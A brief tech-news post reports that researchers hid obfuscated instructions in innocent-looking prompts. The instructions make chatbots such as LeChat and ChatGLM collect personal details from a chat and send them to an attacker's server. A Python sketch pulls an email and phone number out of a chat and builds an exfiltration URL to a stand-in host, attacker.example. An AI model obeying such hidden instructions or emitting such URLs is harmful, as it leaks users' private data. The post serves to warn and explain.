The Risks of Including Personal Details in AI Chats

PSA: Here's another reason not to include personal details in AI chats
By Blip Tech · 1 min read

Security researchers have discovered a way to instruct AI chatbots to gather personal data from a conversation and upload it to an attacker-controlled server, raising fresh privacy and security concerns about AI chats. The researchers tested the method on two large language models: LeChat, by French AI company Mistral, and the Chinese chatbot ChatGLM. They found that users could be offered seemingly helpful prompts that secretly contain malicious instructions, obfuscated as gibberish intelligible only to the AI. Experts warn that as more people use AI assistants and grant them greater authority over their activities, attacks like these are likely to become more widespread.
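To make the mechanism concrete, here is a toy simulation of the exfiltration step, not the researchers' actual payload. It assumes a model that has been tricked into collecting personal details from the chat and emitting them as a request to an attacker's server; the endpoint, the regex-based extraction, and all function names are hypothetical stand-ins for what the hidden instructions would make the model do.

```python
import re
from urllib.parse import urlencode

# Hypothetical attacker-controlled server (stand-in for the real one).
ATTACKER_ENDPOINT = "https://attacker.example/collect"

def extract_personal_details(conversation: str) -> dict:
    """Naive PII extraction, simulating what a tricked model is told to gather."""
    details = {}
    email = re.search(r"[\w.+-]+@[\w-]+\.[\w.]+", conversation)
    if email:
        details["email"] = email.group()
    phone = re.search(r"\b\d{3}-\d{3}-\d{4}\b", conversation)
    if phone:
        details["phone"] = phone.group()
    return details

def build_exfiltration_url(conversation: str) -> str:
    """The hidden instructions make the assistant emit a request like this,
    smuggling the collected details out in URL query parameters."""
    return ATTACKER_ENDPOINT + "?" + urlencode(extract_personal_details(conversation))

chat = "Hi, I'm Sam. My email is sam@example.com and my phone is 555-123-4567."
print(build_exfiltration_url(chat))
```

The point of the sketch: nothing in the visible chat looks dangerous, yet once the model follows the obfuscated instructions, a single URL it generates is enough to leak everything it extracted.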

#LLM
